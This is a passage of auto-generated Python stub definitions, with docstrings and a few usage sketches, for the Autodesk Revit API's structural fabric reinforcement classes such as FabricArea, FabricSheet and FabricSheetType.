doc: The document. system: An FabricArea Reinforcement element in the document. Returns: The ids of the newly created Single Fabric Sheet elements. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass CoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The additional cover offset of the fabric distribution. 
Get: CoverOffset(self: FabricArea) -> float Set: CoverOffset(self: FabricArea) = value """ Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Major Direction of the Fabric Area. Get: Direction(self: FabricArea) -> XYZ """ DirectionOrigin = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Origin Point of the Major Direction of the Fabric Area. Get: DirectionOrigin(self: FabricArea) -> XYZ """ FabricAreaType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of the Fabric Area. Get: FabricAreaType(self: FabricArea) -> FabricAreaType """ FabricLocation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Fabric location in the host. Get: FabricLocation(self: FabricArea) -> FabricLocation Set: FabricLocation(self: FabricArea) = value """ FabricSheetTypeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Fabric Sheet Type for this element. Get: FabricSheetTypeId(self: FabricArea) -> ElementId Set: FabricSheetTypeId(self: FabricArea) = value """ HostId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Host element for the fabric area. Get: HostId(self: FabricArea) -> ElementId """ LapSplicePosition = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric lap splice position in the fabric distribution. Get: LapSplicePosition(self: FabricArea) -> FabricLapSplicePosition Set: LapSplicePosition(self: FabricArea) = value """ MajorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric lap splice length in the fabric distribution in the major direction. Get: MajorLapSpliceLength(self: FabricArea) -> float Set: MajorLapSpliceLength(self: FabricArea) = value """ MajorSheetAlignment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric sheet alignment in the fabric distribution in the major direction. Get: MajorSheetAlignment(self: FabricArea) -> FabricSheetAlignment Set: MajorSheetAlignment(self: FabricArea) = value """ MinorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric lap splice length in the fabric distribution in the minor direction. Get: MinorLapSpliceLength(self: FabricArea) -> float Set: MinorLapSpliceLength(self: FabricArea) = value """ MinorSheetAlignment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The fabric sheet alignment in the fabric distribution in the minor direction. Get: MinorSheetAlignment(self: FabricArea) -> FabricSheetAlignment Set: MinorSheetAlignment(self: FabricArea) = value """ SketchId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Sketch element for this element. Get: SketchId(self: FabricArea) -> ElementId """ TagViewId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The element of the view in which to tag new members of this element. Get: TagViewId(self: FabricArea) -> ElementId Set: TagViewId(self: FabricArea) = value """ class FabricAreaType(ElementType, IDisposable): """ A FabricAreaType object is used in FabricArea object generation. 
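# Usage sketch (not part of the generated stubs): distributing fabric over a floor with the
# host-boundary overload of FabricArea.Create documented above, then querying the sheets it
# generated. Assumes `doc` is the active Document and `floor` is a structural Floor already
# picked by the user; names are illustrative.
import clr
clr.AddReference("RevitAPI")
from Autodesk.Revit.DB import Transaction, XYZ, FilteredElementCollector
from Autodesk.Revit.DB.Structure import FabricArea, FabricAreaType, FabricSheetType, FabricLocation

sheet_type = FilteredElementCollector(doc).OfClass(FabricSheetType).FirstElement()

t = Transaction(doc, "Create FabricArea")
t.Start()
area_type_id = FabricAreaType.CreateDefaultFabricAreaType(doc)
fabric_area = FabricArea.Create(doc, floor, XYZ.BasisX, area_type_id, sheet_type.Id)
fabric_area.FabricLocation = FabricLocation.BottomOrInternal
t.Commit()

print("sheets generated:", fabric_area.GetFabricSheetElementIds().Count)
print("total sheet mass:", fabric_area.GetTotalSheetMass())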
""" @staticmethod def CreateDefaultFabricAreaType(aDoc): """ CreateDefaultFabricAreaType(aDoc: Document) -> ElementId Creates a new FabricAreaType object with a default name. aDoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class FabricHostReference(Enum, IComparable, IFormattable, IConvertible): """ Controls if Single Fabric Sheet should be cut by the Host Cover. enum FabricHostReference, values: CutByCover (1), NotCutByCover (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass CutByCover = None NotCutByCover = None value__ = None class FabricLapSplicePosition(Enum, IComparable, IFormattable, IConvertible): """ Fabric lap splice position in the fabric distribution enum FabricLapSplicePosition, values: Aligned (0), MajorHalfwayStagger (1), MajorPassingStagger (2), MinorHalfwayStagger (3), MinorPassingStagger (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Aligned = None MajorHalfwayStagger = None MajorPassingStagger = None MinorHalfwayStagger = None MinorPassingStagger = None value__ = None class FabricLocation(Enum, IComparable, IFormattable, IConvertible): """ Fabric location in the host enum FabricLocation, values: BottomOrInternal (1), TopOrExternal (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrInternal = None TopOrExternal = None value__ = None class FabricReinSpanSymbol(IndependentTag, IDisposable): """ Represents an instance of a Structural Fabric Reinforcement Symbol in Autodesk Revit. """ @staticmethod def Create(document, viewId, hostId, point, symbolId): """ Create(document: Document, viewId: ElementId, hostId: LinkElementId, point: XYZ, symbolId: ElementId) -> FabricReinSpanSymbol Places a new instance of the Structural Fabric Reinforcement Symbol into the project relative to a particular FabricSheet and View. document: The document. viewId: The id of the view in which the symbol should appear. hostId: The ElementId of FabricSheet (either in the document, or linked from another document). point: The span symbol's head position. symbolId: The id of the family symbol of this symbol. Returns: A reference to the newly-created symbol. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
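# Usage sketch (not part of the generated stubs): placing a FabricReinSpanSymbol relative
# to an existing FabricSheet, per the Create signature documented above. Assumes `doc` is
# the active Document, `view` is a view where the sheet is visible, `sheet` is a FabricSheet
# element, and `span_symbol_id` is the ElementId of a loaded fabric span symbol family type;
# all of these names are illustrative placeholders.
import clr
clr.AddReference("RevitAPI")
from Autodesk.Revit.DB import Transaction, LinkElementId, XYZ
from Autodesk.Revit.DB.Structure import FabricReinSpanSymbol

head_point = XYZ(5, 5, 0)  # symbol head position in model coordinates (feet)

t = Transaction(doc, "Place fabric span symbol")
t.Start()
symbol = FabricReinSpanSymbol.Create(doc, view.Id, LinkElementId(sheet.Id),
                                     head_point, span_symbol_id)
t.Commit()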
initializes x; see x.__class__.__doc__ for signature """ pass class ReinforcementRoundingManager(object, IDisposable): """ A base class providing access to reinforcement rounding overrides for structural elements. """ def Dispose(self): """ Dispose(self: ReinforcementRoundingManager) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementRoundingManager, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Element = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The owner of the reinforcement rounding overrides. Get: Element(self: ReinforcementRoundingManager) -> Element """ IsActiveOnElement = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines whether reinforcement rounding is activated for the particular element. Get: IsActiveOnElement(self: ReinforcementRoundingManager) -> bool Set: IsActiveOnElement(self: ReinforcementRoundingManager) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: ReinforcementRoundingManager) -> bool """ LengthDisplayUnit = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length units used when displaying the reinforcement rounding values. Get: LengthDisplayUnit(self: ReinforcementRoundingManager) -> DisplayUnitType """ class FabricRoundingManager(ReinforcementRoundingManager, IDisposable): """ Provides access to element reinforcement roundings overrides. """ def Dispose(self): """ Dispose(self: ReinforcementRoundingManager, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementRoundingManager, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApplicableReinforcementRoundingSource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the source of the rounding settings for this element. Get: ApplicableReinforcementRoundingSource(self: FabricRoundingManager) -> ReinforcementRoundingSource """ ApplicableSegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for fabric segments. 
Get: ApplicableSegmentLengthRounding(self: FabricRoundingManager) -> float """ ApplicableSegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for fabric segments. Get: ApplicableSegmentLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod """ ApplicableTotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for Cut Overall Length and Cut Overall Width parameters. Get: ApplicableTotalLengthRounding(self: FabricRoundingManager) -> float """ ApplicableTotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for Cut Overall Length and Cut Overall Width parameters. Get: ApplicableTotalLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod """ SegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for fabric segments. Get: SegmentLengthRounding(self: FabricRoundingManager) -> float Set: SegmentLengthRounding(self: FabricRoundingManager) = value """ SegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the segment length rounding method Get: SegmentLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod Set: SegmentLengthRoundingMethod(self: FabricRoundingManager) = value """ TotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for Cut Overall Length and Cut Overall Width parameters. Get: TotalLengthRounding(self: FabricRoundingManager) -> float Set: TotalLengthRounding(self: FabricRoundingManager) = value """ TotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the total length rounding method Get: TotalLengthRoundingMethod(self: FabricRoundingManager) -> RoundingMethod Set: TotalLengthRoundingMethod(self: FabricRoundingManager) = value """ class FabricSheet(Element, IDisposable): """ An object that represents an Fabric Sheet Element within the Autodesk Revit project. """ @staticmethod def Create(document, *__args): """ Create(document: Document, hostElement: Element, fabricSheetTypeId: ElementId) -> FabricSheet Creates a new instance of a single flat Fabric Sheet element within the project. document: The document in which the fabric sheet is to be created. hostElement: The element that will host the FabricSheet. The host can be a Structural Floor, Structural Wall, Structural Slab, or a Part created from a structural layer belonging to one of those element types. fabricSheetTypeId: The id of the FabricSheetType. Returns: The newly created single Fabric Sheet instance. Create(document: Document, concreteHostElementId: ElementId, fabricSheetTypeId: ElementId, bendProfile: CurveLoop) -> FabricSheet Creates a new instance of a single bent Fabric Sheet element within the project. document: The document in which the fabric sheet is to be created. concreteHostElementId: The element that will host the FabricSheet. The host can be a Structural Floor, Structural Wall, Structural Slab, Structural Floor Edge, Structural Slab Edge, Structural Column, Beam and Brace. Also, host can be a Autodesk::Revit::DB::Part created from a structural layer of Structural Floor, Structural Wall or Structural Slab. 
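# Usage sketch (not part of the generated stubs): activating reinforcement rounding on a
# FabricSheetType and setting the segment and total length roundings through the
# FabricRoundingManager members documented above. Assumes `doc` is the active Document
# and at least one FabricSheetType exists; 1/12 ft (one inch) is an illustrative value.
import clr
clr.AddReference("RevitAPI")
from Autodesk.Revit.DB import Transaction, FilteredElementCollector
from Autodesk.Revit.DB.Structure import FabricSheetType

sheet_type = FilteredElementCollector(doc).OfClass(FabricSheetType).FirstElement()
rounding = sheet_type.GetReinforcementRoundingManager()

t = Transaction(doc, "Override fabric rounding")
t.Start()
rounding.IsActiveOnElement = True
rounding.SegmentLengthRounding = 1.0 / 12.0  # internal length unit is feet
rounding.TotalLengthRounding = 1.0 / 12.0
t.Commit()

print(rounding.ApplicableSegmentLengthRounding, rounding.ApplicableReinforcementRoundingSource)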
fabricSheetTypeId: The id of the FabricSheetType. bendProfile: A profile that defines the bending shape of the fabric sheet. The profile can be provided without fillets (e.g. for an L shape, only two lines rather than two lines and one arc); in that case the fillets (in this example, one arc) are generated automatically based on the Bend Diameter parameter defined in the Fabric Wire system family. If the provided profile has no corners (has a tangent defined at each point except the ends), no fillets will be generated. The provided profile defines the center-curve of a wire. Returns: The instance of the newly created bent fabric sheet. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetBendProfile(self): """ GetBendProfile(self: FabricSheet) -> CurveLoop Returns the profile (not including generated fillets) that defines the shape of the Fabric Sheet bending. Returns: The profile that defines the shape of the fabric sheet bending for a bent fabric sheet; for a flat fabric sheet null will be returned. """ pass def GetBendProfileWithFillets(self): """ GetBendProfileWithFillets(self: FabricSheet) -> CurveLoop Returns the profile with generated fillets that defines the shape of the Fabric Sheet bending. Returns: The bend profile with generated fillets that defines the shape of the fabric sheet bending for a bent fabric sheet; for a flat fabric sheet null will be returned. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: FabricSheet) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def GetSegmentParameterIdsAndLengths(self, rounded): """ GetSegmentParameterIdsAndLengths(self: FabricSheet, rounded: bool) -> IDictionary[ElementId, float] Returns the array of pairs [parameter ID, length] that correspond to segments of a bent fabric sheet (like A, B, C, D etc.). rounded: Set to true to return rounded values for segment lengths. Returns: An array of pairs [parameter ID, length] that correspond to segments of a bent fabric sheet (like A, B, C, D etc.) is returned for a bent fabric sheet. For a flat fabric sheet (not bent) an empty array is returned. """ pass def GetSheetLocation(self): """ GetSheetLocation(self: FabricSheet) -> Transform Gets the position and the orientation of the Fabric Sheet instance. Returns: The location of the Fabric Sheet instance. """ pass def GetWireCenterlines(self, wireDirection=None): """ GetWireCenterlines(self: FabricSheet, wireDirection: WireDistributionDirection) -> IList[Curve] Gets a list of curves representing the wire centerlines of the Fabric Sheet. wireDirection: The direction of wire distribution in the Fabric Sheet. Returns: The centerline curves. GetWireCenterlines(self: FabricSheet) -> IList[Curve] Gets a list of curves representing the wire centerlines of the Fabric Sheet in both distribution directions. Returns: The centerline curves. """ pass def IsCoverOffsetValid(self, coverOffset): """ IsCoverOffsetValid(self: FabricSheet, coverOffset: float) -> bool Identifies if the specified value is valid for use as a cover offset. coverOffset: The cover offset value. Returns: True if the value is valid, false if the value is invalid. 
""" pass def IsSingleFabricSheetWithinHost(self, hostElement, transform): """ IsSingleFabricSheetWithinHost(self: FabricSheet, hostElement: Element, transform: Transform) -> bool Identifies if the specified single Fabric Sheet position is within the host. hostElement: A structural element that will host the Fabric Sheet. transform: The transform that defines the placement of the instance single Fabric Sheet. Returns: True if the single Fabric Sheet instance is within the host, false if the single Fabric Sheet instance is out of host. """ pass @staticmethod def IsValidHost(*__args): """ IsValidHost(document: Document, concreteHostElementId: ElementId) -> bool Checks whether an element is a valid host for fabric sheet. document: The document. concreteHostElementId: The elementId to check. Returns: True if the element is a valid host for fabric sheet, false otherwise. IsValidHost(host: Element) -> bool Checks whether an element is a valid host for fabric sheet. host: The element to check. Returns: True if the element is a valid host for fabric sheet, false otherwise. """ pass def PlaceInHost(self, hostElement, transform): """ PlaceInHost(self: FabricSheet, hostElement: Element, transform: Transform) Inserts the single Fabric Sheet instance into the host element. hostElement: A structural element that will host the Fabric Sheet. The element must support fabric hosting. transform: The transform that defines the placement of the instance single Fabric Sheet. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetBendProfile(self, bendProfile): """ SetBendProfile(self: FabricSheet, bendProfile: CurveLoop) Sets new profile that defines the shape of the Fabric Sheet bending. bendProfile: A profile that defines the bending shape of the fabric sheet. The profile can be provided without fillets (eg. for L shape, only two lines not two lines and one arc), if so, then fillets (in example one arc) will be automatically generated basing on the Bend Diameter parameter defined in the Fabric Wire system family. If the provided profile has no corners (has a tangent defined at each point except the ends), no fillets will be generated. The provided profile defines the center-curve of a wire. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetSegmentLength(self, segmentParameterId, value): """ SetSegmentLength(self: FabricSheet, segmentParameterId: ElementId, value: float) Sets the value of the bent fabric sheet segment(like A, B, C, D etc.) segmentParameterId: The segment ID of the bent fabric sheet. value: The length value to set """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BendFinalLoopOrientationVector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Direction of local Fabric Sheet Y axis in bending polyline LCS. 
Get: BendFinalLoopOrientationVector(self: FabricSheet) -> XYZ """ BentFabricBendDirection = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies which wire direction of the fabric sheet is bent. Get: BentFabricBendDirection(self: FabricSheet) -> BentFabricBendDirection Set: BentFabricBendDirection(self: FabricSheet) = value """ BentFabricLongitudinalCutLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the cut length of the fabric sheet perpendicular to the bend edge. Get: BentFabricLongitudinalCutLength(self: FabricSheet) -> float Set: BentFabricLongitudinalCutLength(self: FabricSheet) = value """ BentFabricStraightWiresLocation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the location of straight bars with respect to bent bars in the fabric sheet. Get: BentFabricStraightWiresLocation(self: FabricSheet) -> BentFabricStraightWiresLocation Set: BentFabricStraightWiresLocation(self: FabricSheet) = value """ BentFabricWiresOrientation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the location of the straight bars in the fabric sheet. Get: BentFabricWiresOrientation(self: FabricSheet) -> BentFabricWiresOrientation Set: BentFabricWiresOrientation(self: FabricSheet) = value """ CoverOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The additional cover offset of the Fabric Sheet. Get: CoverOffset(self: FabricSheet) -> float Set: CoverOffset(self: FabricSheet) = value """ CutOverallLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet length after cutting has taken place. Get: CutOverallLength(self: FabricSheet) -> float """ CutOverallWidth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet width after cutting has taken place. Get: CutOverallWidth(self: FabricSheet) -> float """ CutSheetMass = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet mass after cutting has taken place. Get: CutSheetMass(self: FabricSheet) -> float """ FabricAreaOwnerId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Fabric Area Id. Get: FabricAreaOwnerId(self: FabricSheet) -> ElementId """ FabricHostReference = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Controls if Single Fabric Sheet should be cut by the Host Cover. Get: FabricHostReference(self: FabricSheet) -> FabricHostReference Set: FabricHostReference(self: FabricSheet) = value """ FabricLocation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Fabric Sheet location in the host. Get: FabricLocation(self: FabricSheet) -> FabricLocation Set: FabricLocation(self: FabricSheet) = value """ FabricNumber = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies the numerical parameter assigned to the fabric sheet and any sheet of the same type, dimension, material, shape, and partition. Get: FabricNumber(self: FabricSheet) -> str """ HostId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The structure element that contains the Fabric Sheet. 
Get: HostId(self: FabricSheet) -> ElementId """ IsBent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of fabric sheet. True for bent fabric sheet, false for flat fabric sheet. Get: IsBent(self: FabricSheet) -> bool """ SketchId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Sketch element for this element. Get: SketchId(self: FabricSheet) -> ElementId """ class FabricSheetAlignment(Enum, IComparable, IFormattable, IConvertible): """ Fabric Sheet alignment in the fabric distribution enum FabricSheetAlignment, values: BothEdges (3), EndingEdge (2), Null (0), StartingEdge (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BothEdges = None EndingEdge = None Null = None StartingEdge = None value__ = None class FabricSheetLayoutPattern(Enum, IComparable, IFormattable, IConvertible): """ The pattern for how the wires in Fabric Sheet are laid out. enum FabricSheetLayoutPattern, values: ActualSpacing (0), FixedNumber (1), MaximumSpacing (2), NumberWithSpacing (3), QuantitativeSpacing (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ActualSpacing = None FixedNumber = None MaximumSpacing = None NumberWithSpacing = None QuantitativeSpacing = None value__ = None class FabricSheetType(ElementType, IDisposable): """ Represents a fabric sheet type, used in the generation of fabric wires. """ @staticmethod def CreateDefaultFabricSheetType(ADoc): """ CreateDefaultFabricSheetType(ADoc: Document) -> ElementId Creates a new FabricSheetType object with a default name. ADoc: The document. Returns: The newly created type id. 
""" pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: FabricSheetType) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def GetWireItem(self, wireIndex, direction): """ GetWireItem(self: FabricSheetType, wireIndex: int, direction: WireDistributionDirection) -> FabricWireItem Gets the Wire stored in the FabricSheetType at the associated index. wireIndex: Item index in the Fabric Sheet direction: Wire distribution direction of the inquired item Returns: Fabric wire Item """ pass def IsCustom(self): """ IsCustom(self: FabricSheetType) -> bool Verifies if the type is Custom Fabric Sheet Returns: True if Layout is set on Custom and if the wireArr is not null """ pass def IsValidMajorLapSplice(self, majorLapSplice): """ IsValidMajorLapSplice(self: FabricSheetType, majorLapSplice: float) -> bool Identifies if the input value is valid to be applied as the major lap splice value for this FabricSheetType. """ pass def IsValidMinorLapSplice(self, minorLapSplice): """ IsValidMinorLapSplice(self: FabricSheetType, minorLapSplice: float) -> bool Identifies if the input value is valid to be applied as the minor lap splice value for this FabricSheetType. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetLayoutAsCustomPattern(self, minorStartOverhang, minorEndOverhang, majorStartOverhang, majorEndOverhang, minorFabricWireItems, majorFabricWireItems): """ SetLayoutAsCustomPattern(self: FabricSheetType, minorStartOverhang: float, minorEndOverhang: float, majorStartOverhang: float, majorEndOverhang: float, minorFabricWireItems: IList[FabricWireItem], majorFabricWireItems: IList[FabricWireItem]) """ pass def SetMajorLayoutAsActualSpacing(self, overallWidth, minorStartOverhang, spacing): """ SetMajorLayoutAsActualSpacing(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, spacing: float) Sets the major layout pattern as ActualSpacing, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. spacing: The distance between the wires in the major direction. """ pass def SetMajorLayoutAsFixedNumber(self, overallWidth, 